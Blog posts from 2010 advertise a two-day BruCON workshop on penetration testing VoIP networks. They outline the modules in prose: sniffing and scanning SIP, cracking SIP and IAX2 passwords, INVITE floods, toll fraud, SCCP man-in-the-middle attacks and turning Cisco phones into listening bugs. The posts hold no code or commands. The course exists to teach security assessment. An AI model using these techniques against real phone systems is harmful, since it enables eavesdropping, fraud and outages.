Showing posts with label voip penetration test. Show all posts
Showing posts with label voip penetration test. Show all posts

Tuesday, September 7, 2010

BruCON Training: Module 4, Attacking Unified Communications

The final module in the upcoming pentesting VoIP crashcourse is the most exciting one. In this section we look at VoIP systems as a whole. Unified communications is one of those words that have been hyped up to include everything, from chat to video phone calls and SMS. What we will look at in this section is how to go about breaking into the following during a penetration test:
  1. Web application security flaws in Asterisk-based PBX servers
  2. Attacking various services open in PBX servers, such as TFTP
  3. How once you're on a PBX network, you can sometimes simply use your phone to spy on other phone calls
  4. How to make use of hardware taps 
  5. Hardware phone features that can be abused
  6. Abuse of various exposed features in Cisco call manager accessible on the HTTP server

This module will help familiarize the attendees with the target servers and system. Who knows, it may even give a kick-start to find some new 0-days in one of these Unified Communications solutions ;-)

Wednesday, September 1, 2010

BruCON Training: Module 2, Attacking signaling protocols

This is part of the BruCON VoIP security crash course training intro. For more information about the course and to secure a place, check out the BruCON website.

Most VoIP systems perform signaling using a protocol separate than the media transfer protocol. Signaling protocols allow VoIP systems to register, authenticate, and initiate phone calls and tends to carry a lot of intelligence with it. In this part of the training, Joffrey and myself will talk you through the following different signaling protocols and attacks that apply to these protocols:
  • SIP - an open standard
  • IAX2 - used by Asterisk PBX and compatible phones
  • SCCP (Skinny) - used by Cisco systems
  • MGCP - the media gateway control protocol, typically used between gateways and IVR systems
  • H.323 - found in gateways and older systems
The fun part? The exercises! We plan to use a hands-on approach rather than simply describe the protocols and attacks.

These are some of the practicals we have in store:

  1. Sniffing SIP, in order to understand how it all works and also spy on the metadata or signal
  2. Scanning SIP, to see how we can easily identify SIP devices very quickly using SIPVicious and other tools
  3. SIP extension enumeration and online password cracking, to understand better how VoIP attackers are in fact making phone calls for free at the expense of their victims
  4. Avoiding toll / fraudulent calls, featuring the main ways that attackers are abusing SIP PBX servers out there
  5. INVITE floods, which is still an effective attack and bring down various SIP enabled devices
  6. Fuzzing SIP, existent tools and their usage
  7. Using John the ripper to crack SIP passwords, which also includes capturing the SIP authentication messages and patching John the ripper to crack the hash
  8. Online and offline password cracking in IAX2, the tools and their usage
  9. Scanning IAX2 which allows us to find Asterisk servers
  10. MiTM attacks using SCCP proxy, which is a fun way of playing with the phones and can allow us to turn Cisco phones into remote spy bugs
  11. Capture FAC (Forced Authorization Codes) code, which is a restriction usually used in Cisco VoIP environments to allow / block international calls
  12. Call fraud with MGCP, since MGCP has little or no security
  13. DoS on MGCP, or how to cause your VoIP Gateway to go down
  14. RTP redirection, which can allow all sorts of fun (and sometimes profit)
  15. Callmanager hijack (details later ;-))
With all these exercises we expect all the attendees to get really busy and gain useful experience with the signaling protocols.

Tuesday, August 31, 2010

BruCON Training: Module 1, An Introduction to ...

An Introduction to VoIP technology, security threats and solutions, module 1. This module allow us to set the stage for the rest of the training. We will introduce the players - Asterisk, Cisco unified communications and other products. We will introduce the protocols briefly - SIP, SCCP (Skinny), IAX2, H.323 and MGCP. We will also look at how VLANs and other solutions are used to provide security (and where they fail).

We will then focus on security in terms of confidentiality, integrity and availability without going into too much detail (just to wet your appetite ;-)).

When it comes to VoIP, confidentiality ensures that the communications - phone calls and any signaling data - cannot be spied upon. Confidentiality is a major weakness in the case of many VoIP systems. One obvious security issue is when internal attackers spy on phone calls by sniffing the RTP stream. However this is not the only attack vector. We will give examples of tricks that can be pulled off by external attackers that allow them to compromise confidentiality remotely, without (layer 2) access to the network.

Caller ID spoofing, toll fraud and modification of signal or media affects the integrity of the VoIP system. In this section we will look at these and various other security flaws that do not necessarily allow attackers to gain illegal access to confidential information. These security flaws however, may allow attackers to cause organizations to loose large sums of money.

This tends to be the security flaw that really affects organizations directly. When the phone system is down, many organizations suffer. This is especially true for call centers, which base their revenues on phone calls. With VoIP, attackers can abuse flaws at various levels to cause denial of service. In this section we will introduce some attacks that are specific to VoIP and others that affect systems in general.

Tuesday, June 8, 2010

A crashcourse in pentesting VOIP networks at BruCON 2010

Joffrey CZARNY and myself (Sandro) will be hosting a crashcourse at BruCON 2010. This will be a two day workshop on the 22 & 23 September 2010. In a nutshell, we will be helping the attendees quickly get up to speed with VoIP networks and performing security assessments in that idea. More information about the training can be found at the official page.

If you would like to register for the training go straight to the BruCON training registration page. Hope to see you there!

As always, I'll be glad to answer any questions by email.